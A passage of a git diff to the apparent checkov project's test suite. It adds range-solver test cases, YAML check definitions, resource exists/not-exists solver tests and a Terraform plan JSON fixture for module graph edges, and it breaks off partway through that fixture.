diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf
index 518d2d7cc0a..aaceeb8387e 100644
--- a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/resources/main.tf
@@ -22,6 +22,10 @@ resource "test" "pass6" {
   range = "2000-4000"
 }
 
+resource "test" "pass7" {
+  range = ["2100","2000-4000","3400"]
+}
+
 resource "test" "fail1" {
   range = 2000
 }
@@ -53,3 +57,7 @@ resource "test" "fail7" {
 resource "test" "fail8" {
   range = "1000-5000-6000"
 }
+
+resource "test" "fail9" {
+  range = ["1000","2000-2900"]
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py
index f3956bc5bf5..ae1a2a0f809 100644
--- a/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_includes_solver/test_solver.py
@@ -17,8 +17,9 @@ def setUp(self):
     def test_range_includes_int_solver(self):
         root_folder = 'resources'
         check_id = "RangeIncludesInt"
-        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
-        should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', 'test.fail8']
+        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
@@ -26,9 +27,9 @@ def test_range_includes_int_solver(self):
     def test_range_includes_string_solver(self):
         root_folder = 'resources'
         check_id = "RangeIncludesString"
-        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
+        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
         should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
-                       'test.fail8']
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
@@ -36,8 +37,9 @@ def test_range_includes_string_solver(self):
     def test_range_includes_int_jsonpath_solver(self):
         root_folder = 'resources'
         check_id = "JsonPathRangeIncludesInt"
-        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
-        should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', 'test.fail8']
+        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
@@ -45,9 +47,29 @@ def test_range_includes_int_jsonpath_solver(self):
     def test_range_includes_string_jsonpath_solver(self):
         root_folder = 'resources'
         check_id = "JsonPathRangeIncludesString"
-        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
+        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
         should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
-                       'test.fail8']
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
+
+    def test_range_includes_list_solver(self):
+        root_folder = 'resources'
+        check_id = "RangeIncludesList"
+        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
+        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
+
+    def test_range_includes_list_jsonpath_solver(self):
+        root_folder = 'resources'
+        check_id = "JsonPathRangeIncludesList"
+        should_pass = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_fail = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
+        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
\ No newline at end of file
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/JsonPathRangeNotIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/JsonPathRangeNotIncludesList.yaml
new file mode 100644
index 00000000000..bdd53a1e7a9
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/JsonPathRangeNotIncludesList.yaml
@@ -0,0 +1,16 @@
+metadata:
+  name: "example"
+  category: "GENERAL_SECURITY"
+  id: "JsonPathRangeNotIncludesList"
+scope:
+  provider: "AWS"
+definition:
+  cond_type: "attribute"
+  resource_types:
+    - "test"
+  attribute: "range"
+  operator: "jsonpath_range_not_includes"
+  value:
+    - "3001"
+    - 3000
+    - 3002
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/RangeNotIncludesList.yaml b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/RangeNotIncludesList.yaml
new file mode 100644
index 00000000000..57e07c412ce
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/RangeNotIncludesList.yaml
@@ -0,0 +1,16 @@
+metadata:
+  name: "example"
+  category: "GENERAL_SECURITY"
+  id: "RangeNotIncludesList"
+scope:
+  provider: "AWS"
+definition:
+  cond_type: "attribute"
+  resource_types:
+    - "test"
+  attribute: "range"
+  operator: "range_not_includes"
+  value:
+    - "3000"
+    - 3001
+    - "3002"
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf
index 518d2d7cc0a..211a276e8ea 100644
--- a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/resources/main.tf
@@ -22,6 +22,10 @@ resource "test" "pass6" {
   range = "2000-4000"
 }
 
+resource "test" "pass7" {
+  range = ["2000-2500","3000"]
+}
+
 resource "test" "fail1" {
   range = 2000
 }
@@ -53,3 +57,7 @@ resource "test" "fail7" {
 resource "test" "fail8" {
   range = "1000-5000-6000"
 }
+
+resource "test" "fail9" {
+  range = ["1000-2900","3100-4000"]
+}
diff --git a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py
index fef72aa1da7..9c8739dead5 100644
--- a/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py
+++ b/tests/terraform/graph/checks_infra/attribute_solvers/range_not_includes_solver/test_solver.py
@@ -17,8 +17,9 @@ def setUp(self):
     def test_range_not_includes_int_solver(self):
         root_folder = 'resources'
         check_id = "RangeNotIncludesInt"
-        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
-        should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', 'test.fail8']
+        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
@@ -26,9 +27,9 @@ def test_range_not_includes_int_solver(self):
     def test_range_not_includes_string_solver(self):
         root_folder = 'resources'
         check_id = "RangeNotIncludesString"
-        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
+        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
         should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
-                       'test.fail8']
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
@@ -36,9 +37,9 @@ def test_range_not_includes_string_solver(self):
     def test_range_not_includes_int_jsonpath_solver(self):
         root_folder = 'resources'
         check_id = "JsonPathRangeNotIncludesInt"
-        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
+        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
         should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
-                       'test.fail8']
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
@@ -46,9 +47,29 @@ def test_range_not_includes_int_jsonpath_solver(self):
     def test_range_not_includes_string_jsonpath_solver(self):
         root_folder = 'resources'
         check_id = "JsonPathRangeNotIncludesString"
-        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6']
+        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
+        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
+
+    def test_range_not_includes_list_solver(self):
+        root_folder = 'resources'
+        check_id = "RangeNotIncludesList"
+        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
+        should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
+                       'test.fail8', 'test.fail9']
+        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
+
+    def test_range_not_includes_list_jsonpath_solver(self):
+        root_folder = 'resources'
+        check_id = "JsonPathRangeNotIncludesList"
+        should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7']
         should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7',
-                       'test.fail8']
+                       'test.fail8', 'test.fail9']
         expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
 
         self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)
diff --git a/checkov/sca_package/__init__.py b/tests/terraform/graph/checks_infra/resource_solvers/__init__.py
similarity index 100%
rename from checkov/sca_package/__init__.py
rename to tests/terraform/graph/checks_infra/resource_solvers/__init__.py
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/ResourceAllowList.yaml b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/ResourceAllowList.yaml
new file mode 100644
index 00000000000..774200c0c52
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/ResourceAllowList.yaml
@@ -0,0 +1,11 @@
+metadata:
+  name: "example"
+  category: "GENERAL_SECURITY"
+  id: "ResourceAllowList"
+scope:
+  provider: "AWS"
+definition:
+  cond_type: "resource"
+  resource_types:
+    - "aws_s3_bucket"
+  operator: "exists"
diff --git a/tests/azure_pipelines/image_referencer/__init__.py b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/__init__.py
similarity index 100%
rename from tests/azure_pipelines/image_referencer/__init__.py
rename to tests/terraform/graph/checks_infra/resource_solvers/exists_solver/__init__.py
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/test_solver.py b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/test_solver.py
new file mode 100644
index 00000000000..34f637e9314
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/test_solver.py
@@ -0,0 +1,33 @@
+from pathlib import Path
+
+from parameterized import parameterized_class
+
+from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
+
+TEST_DIRNAME = Path(__file__).parent
+
+
+@parameterized_class([{"graph_framework": "NETWORKX"}, {"graph_framework": "IGRAPH"}])
+class ExistsSolver(TestBaseSolver):
+    def setUp(self):
+        self.checks_dir = str(TEST_DIRNAME)
+        super().setUp()
+
+    def test_allow_list(self):
+        # given
+        root_folder = TEST_DIRNAME.parents[2] / "resources/encryption_test"
+        check_id = "ResourceAllowList"
+        should_pass = [
+            "aws_s3_bucket.encrypted_bucket",
+            "aws_s3_bucket.unencrypted_bucket",
+        ]
+        should_fail = [
+            "aws_rds_cluster.rds_cluster_encrypted",
+            "aws_rds_cluster.rds_cluster_unencrypted",
+            "aws_neptune_cluster.encrypted_neptune",
+            "aws_neptune_cluster.unencrypted_neptune",
+        ]
+        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+        # when/then
+        self.run_test(root_folder=str(root_folder), expected_results=expected_results, check_id=check_id)
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/ResourceDenyList.yaml b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/ResourceDenyList.yaml
new file mode 100644
index 00000000000..fa5101eae62
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/ResourceDenyList.yaml
@@ -0,0 +1,11 @@
+metadata:
+  name: "example"
+  category: "GENERAL_SECURITY"
+  id: "ResourceDenyList"
+scope:
+  provider: "AWS"
+definition:
+  cond_type: "resource"
+  resource_types:
+    - "aws_s3_bucket"
+  operator: "not_exists"
diff --git a/tests/circleci_pipelines/image_referencer/__init__.py b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/__init__.py
similarity index 100%
rename from tests/circleci_pipelines/image_referencer/__init__.py
rename to tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/__init__.py
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/test_solver.py b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/test_solver.py
new file mode 100644
index 00000000000..565cc1a1a03
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/test_solver.py
@@ -0,0 +1,33 @@
+from pathlib import Path
+
+from parameterized import parameterized_class
+
+from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
+
+TEST_DIRNAME = Path(__file__).parent
+
+
+@parameterized_class([{"graph_framework": "NETWORKX"}, {"graph_framework": "IGRAPH"}])
+class NotExistsSolver(TestBaseSolver):
+    def setUp(self):
+        self.checks_dir = str(TEST_DIRNAME)
+        super().setUp()
+
+    def test_deny_list(self):
+        # given
+        root_folder = TEST_DIRNAME.parents[2] / "resources/encryption_test"
+        check_id = "ResourceDenyList"
+        should_pass = [
+            "aws_rds_cluster.rds_cluster_encrypted",
+            "aws_rds_cluster.rds_cluster_unencrypted",
+            "aws_neptune_cluster.encrypted_neptune",
+            "aws_neptune_cluster.unencrypted_neptune",
+        ]
+        should_fail = [
+            "aws_s3_bucket.encrypted_bucket",
+            "aws_s3_bucket.unencrypted_bucket",
+        ]
+        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+        # when/then
+        self.run_test(root_folder=str(root_folder), expected_results=expected_results, check_id=check_id)
diff --git a/tests/terraform/graph/graph_builder/test_graph_builder.py b/tests/terraform/graph/graph_builder/test_graph_builder.py
index f5dd975d485..70f30e6a916 100644
--- a/tests/terraform/graph/graph_builder/test_graph_builder.py
+++ b/tests/terraform/graph/graph_builder/test_graph_builder.py
@@ -9,6 +9,7 @@
 from checkov.terraform.graph_manager import TerraformGraphManager
 from checkov.common.graph.graph_builder import CustomAttributes
 from checkov.terraform.modules.module_utils import external_modules_download_path
+from checkov.terraform.plan_utils import create_definitions
 
 TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))
 
@@ -372,6 +373,13 @@ def test_build_rustworkx_graph(self):
         self.check_edge(graph, resource_node, var_region_node, 'region')
         self.check_edge(graph, provider_node, var_aws_profile_node, 'profile')
         self.check_edge(graph, local_node, var_bucket_name_node, 'bucket_name')
+    
+    def test_multiple_modules_with_connected_resources(self):
+        valid_plan_path = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules_edges_tfplan/tfplan.json'))
+        definitions, definitions_raw = create_definitions(root_folder=None, files=[valid_plan_path])
+        graph_manager = TerraformGraphManager(db_connector=RustworkxConnector())
+        tf_plan_local_graph = graph_manager.build_graph_from_definitions(definitions, render_variables=False)
+        self.assertTrue(tf_plan_local_graph.in_edges[2])
 
 
 def build_new_key_for_tf_definition(key):
diff --git a/tests/terraform/graph/graph_builder/test_local_graph.py b/tests/terraform/graph/graph_builder/test_local_graph.py
index b6463f1be98..9abb9fa7fd7 100644
--- a/tests/terraform/graph/graph_builder/test_local_graph.py
+++ b/tests/terraform/graph/graph_builder/test_local_graph.py
@@ -434,4 +434,3 @@ def test_variables_same_name_different_modules(self):
         # Check they point to 2 different modules
         self.assertEqual(2, len(module_variable_edges))
         self.assertNotEqual(local_graph.vertices[module_variable_edges[0].origin], local_graph.vertices[module_variable_edges[1].origin])
-
diff --git a/tests/terraform/graph/resources/modules_edges_tfplan/s3module.tf b/tests/terraform/graph/resources/modules_edges_tfplan/s3module.tf
new file mode 100644
index 00000000000..e29f6e181fc
--- /dev/null
+++ b/tests/terraform/graph/resources/modules_edges_tfplan/s3module.tf
@@ -0,0 +1,9 @@
+module "s3-bucket-1" {
+  source  = "terraform-aws-modules/s3-bucket/aws"
+  version = "4.0.1"
+}
+
+module "s3-bucket-2" {
+  source  = "terraform-aws-modules/s3-bucket/aws"
+  version = "4.0.1"
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/resources/modules_edges_tfplan/tfplan.json b/tests/terraform/graph/resources/modules_edges_tfplan/tfplan.json
new file mode 100644
index 00000000000..4db9d4c8a9f
--- /dev/null
+++ b/tests/terraform/graph/resources/modules_edges_tfplan/tfplan.json
@@ -0,0 +1,4123 @@
+{
+    "format_version": "0.2",
+    "terraform_version": "1.0.7",
+    "planned_values": {
+        "root_module": {
+            "child_modules": [
+                {
+                    "resources": [
+                        {
+                            "address": "module.s3-bucket-1.aws_s3_bucket.this[0]",
+                            "mode": "managed",
+                            "type": "aws_s3_bucket",
+                            "name": "this",
+                            "index": 0,
+                            "provider_name": "registry.terraform.io/hashicorp/aws",
+                            "schema_version": 0,
+                            "values": {
+                                "force_destroy": false,
+                                "object_lock_enabled": false,
+                                "tags": null,
+                                "timeouts": null
+                            },
+                            "sensitive_values": {
+                                "cors_rule": [],
+                                "grant": [],
+                                "lifecycle_rule": [],
+                                "logging": [],
+                                "object_lock_configuration": [],
+                                "replication_configuration": [],
+                                "server_side_encryption_configuration": [],
+                                "tags_all": {},
+                                "versioning": [],
+                                "website": []
+                            }
+                        },
+                        {
+                            "address": "module.s3-bucket-1.aws_s3_bucket_public_access_block.this[0]",
+                            "mode": "managed",
+                            "type": "aws_s3_bucket_public_access_block",
+                            "name": "this",
+                            "index": 0,
+                            "provider_name": "registry.terraform.io/hashicorp/aws",
+                            "schema_version": 0,
+                            "values": {
+                                "block_public_acls": true,
+                                "block_public_policy": true,
+                                "ignore_public_acls": true,
+                                "restrict_public_buckets": true
+                            },
+                            "sensitive_values": {}
+                        }
+                    ],
+                    "address": "module.s3-bucket-1"
+                },
+                {
+                    "resources": [
+                        {
+                            "address": "module.s3-bucket-2.aws_s3_bucket.this[0]",
+                            "mode": "managed",
+                            "type": "aws_s3_bucket",
+                            "name": "this",
+                            "index": 0,
+                            "provider_name": "registry.terraform.io/hashicorp/aws",
+                            "schema_version": 0,
+                            "values": {
+                                "force_destroy": false,
+                                "object_lock_enabled": false,
+                                "tags": null,
+                                "timeouts": null
+                            },
+                            "sensitive_values": {
+                                "cors_rule": [],
+                                "grant": [],
+                                "lifecycle_rule": [],
+                                "logging": [],
+                                "object_lock_configuration": [],
+                                "replication_configuration": [],
+                                "server_side_encryption_configuration": [],
+                                "tags_all": {},
+                                "versioning": [],
+                                "website": []
+                            }
+                        },
+                        {
+                            "address": "module.s3-bucket-2.aws_s3_bucket_public_access_block.this[0]",
+                            "mode": "managed",
+                            "type": "aws_s3_bucket_public_access_block",
+                            "name": "this",
+                            "index": 0,
+                            "provider_name": "registry.terraform.io/hashicorp/aws",
+                            "schema_version": 0,
+                            "values": {
+                                "block_public_acls": true,
+                                "block_public_policy": true,
+                                "ignore_public_acls": true,
+                                "restrict_public_buckets": true
+                            },
+                            "sensitive_values": {}
+                        }
+                    ],
+                    "address": "module.s3-bucket-2"
+                }
+            ]
+        }
+    },
+    "resource_changes": [
+        {
+            "address": "module.s3-bucket-1.aws_s3_bucket.this[0]",
+            "module_address": "module.s3-bucket-1",
+            "mode": "managed",
+            "type": "aws_s3_bucket",
+            "name": "this",
+            "index": 0,
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "create"
+                ],
+                "before": null,
+                "after": {
+                    "force_destroy": false,
+                    "object_lock_enabled": false,
+                    "tags": null,
+                    "timeouts": null
+                },
+                "after_unknown": {
+                    "acceleration_status": true,
+                    "acl": true,
+                    "arn": true,
+                    "bucket": true,
+                    "bucket_domain_name": true,
+                    "bucket_prefix": true,
+                    "bucket_regional_domain_name": true,
+                    "cors_rule": true,
+                    "grant": true,
+                    "hosted_zone_id": true,
+                    "id": true,
+                    "lifecycle_rule": true,
+                    "logging": true,
+                    "object_lock_configuration": true,
+                    "policy": true,
+                    "region": true,
+                    "replication_configuration": true,
+                    "request_payer": true,
+                    "server_side_encryption_configuration": true,
+                    "tags_all": true,
+                    "versioning": true,
+                    "website": true,
+                    "website_domain": true,
+                    "website_endpoint": true
+                },
+                "before_sensitive": false,
+                "after_sensitive": {
+                    "cors_rule": [],
+                    "grant": [],
+                    "lifecycle_rule": [],
+                    "logging": [],
+                    "object_lock_configuration": [],
+                    "replication_configuration": [],
+                    "server_side_encryption_configuration": [],
+                    "tags_all": {},
+                    "versioning": [],
+                    "website": []
+                }
+            }
+        },
+        {
+            "address": "module.s3-bucket-1.aws_s3_bucket_public_access_block.this[0]",
+            "module_address": "module.s3-bucket-1",
+            "mode": "managed",
+            "type": "aws_s3_bucket_public_access_block",
+            "name": "this",
+            "index": 0,
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "create"
+                ],
+                "before": null,
+                "after": {
+                    "block_public_acls": true,
+                    "block_public_policy": true,
+                    "ignore_public_acls": true,
+                    "restrict_public_buckets": true
+                },
+                "after_unknown": {
+                    "bucket": true,
+                    "id": true
+                },
+                "before_sensitive": false,
+                "after_sensitive": {}
+            }
+        },
+        {
+            "address": "module.s3-bucket-2.aws_s3_bucket.this[0]",
+            "module_address": "module.s3-bucket-2",
+            "mode": "managed",
+            "type": "aws_s3_bucket",
+            "name": "this",
+            "index": 0,
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "create"
+                ],
+                "before": null,
+                "after": {
+                    "force_destroy": false,
+                    "object_lock_enabled": false,
+                    "tags": null,
+                    "timeouts": null
+                },
+                "after_unknown": {
+                    "acceleration_status": true,
+                    "acl": true,
+                    "arn": true,
+                    "bucket": true,
+                    "bucket_domain_name": true,
+                    "bucket_prefix": true,
+                    "bucket_regional_domain_name": true,
+                    "cors_rule": true,
+                    "grant": true,
+                    "hosted_zone_id": true,
+                    "id": true,
+                    "lifecycle_rule": true,
+                    "logging": true,
+                    "object_lock_configuration": true,
+                    "policy": true,
+                    "region": true,
+                    "replication_configuration": true,
+                    "request_payer": true,
+                    "server_side_encryption_configuration": true,
+                    "tags_all": true,
+                    "versioning": true,
+                    "website": true,
+                    "website_domain": true,
+                    "website_endpoint": true
+                },
+                "before_sensitive": false,
+                "after_sensitive": {
+                    "cors_rule": [],
+                    "grant": [],
+                    "lifecycle_rule": [],
+                    "logging": [],
+                    "object_lock_configuration": [],
+                    "replication_configuration": [],
+                    "server_side_encryption_configuration": [],
+                    "tags_all": {},
+                    "versioning": [],
+                    "website": []
+                }
+            }
+        },
+        {
+            "address": "module.s3-bucket-2.aws_s3_bucket_public_access_block.this[0]",
+            "module_address": "module.s3-bucket-2",
+            "mode": "managed",
+            "type": "aws_s3_bucket_public_access_block",
+            "name": "this",
+            "index": 0,
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "create"
+                ],
+                "before": null,
+                "after": {
+                    "block_public_acls": true,
+                    "block_public_policy": true,
+                    "ignore_public_acls": true,
+                    "restrict_public_buckets": true
+                },
+                "after_unknown": {
+                    "bucket": true,
+                    "id": true
+                },
+                "before_sensitive": false,
+                "after_sensitive": {}
+            }
+        }
+    ],
+    "prior_state": {
+        "format_version": "0.2",
+        "terraform_version": "1.0.7",
+        "values": {
+            "root_module": {
+                "child_modules": [
+                    {
+                        "resources": [
+                            {
+                                "address": "module.s3-bucket-1.data.aws_caller_identity.current",
+                                "mode": "data",
+                                "type": "aws_caller_identity",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "account_id": "101860328116",
+                                    "arn": "arn:aws:iam::101860328116:user/atlantis",
+                                    "id": "101860328116",
+                                    "user_id": "AIDARPN2ZIK2PHMJSNYXG"
+                                },
+                                "sensitive_values": {}
+                            },
+                            {
+                                "address": "module.s3-bucket-1.data.aws_partition.current",
+                                "mode": "data",
+                                "type": "aws_partition",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "dns_suffix": "amazonaws.com",
+                                    "id": "aws",
+                                    "partition": "aws",
+                                    "reverse_dns_prefix": "com.amazonaws"
+                                },
+                                "sensitive_values": {}
+                            },
+                            {
+                                "address": "module.s3-bucket-1.data.aws_region.current",
+                                "mode": "data",
+                                "type": "aws_region",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "description": "Europe (Frankfurt)",
+                                    "endpoint": "ec2.eu-central-1.amazonaws.com",
+                                    "id": "eu-central-1",
+                                    "name": "eu-central-1"
+                                },
+                                "sensitive_values": {}
+                            }
+                        ],
+                        "address": "module.s3-bucket-1"
+                    },
+                    {
+                        "resources": [
+                            {
+                                "address": "module.s3-bucket-2.data.aws_caller_identity.current",
+                                "mode": "data",
+                                "type": "aws_caller_identity",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "account_id": "101860328116",
+                                    "arn": "arn:aws:iam::101860328116:user/atlantis",
+                                    "id": "101860328116",
+                                    "user_id": "AIDARPN2ZIK2PHMJSNYXG"
+                                },
+                                "sensitive_values": {}
+                            },
+                            {
+                                "address": "module.s3-bucket-2.data.aws_partition.current",
+                                "mode": "data",
+                                "type": "aws_partition",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "dns_suffix": "amazonaws.com",
+                                    "id": "aws",
+                                    "partition": "aws",
+                                    "reverse_dns_prefix": "com.amazonaws"
+                                },
+                                "sensitive_values": {}
+                            },
+                            {
+                                "address": "module.s3-bucket-2.data.aws_region.current",
+                                "mode": "data",
+                                "type": "aws_region",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "description": "Europe (Frankfurt)",
+                                    "endpoint": "ec2.eu-central-1.amazonaws.com",
+                                    "id": "eu-central-1",
+                                    "name": "eu-central-1"
+                                },
+                                "sensitive_values": {}
+                            }
+                        ],
+                        "address": "module.s3-bucket-2"
+                    }
+                ]
+            }
+        }
+    },
+    "configuration": {
+        "provider_config": {
+            "aws": {
+                "name": "aws",
+                "expressions": {
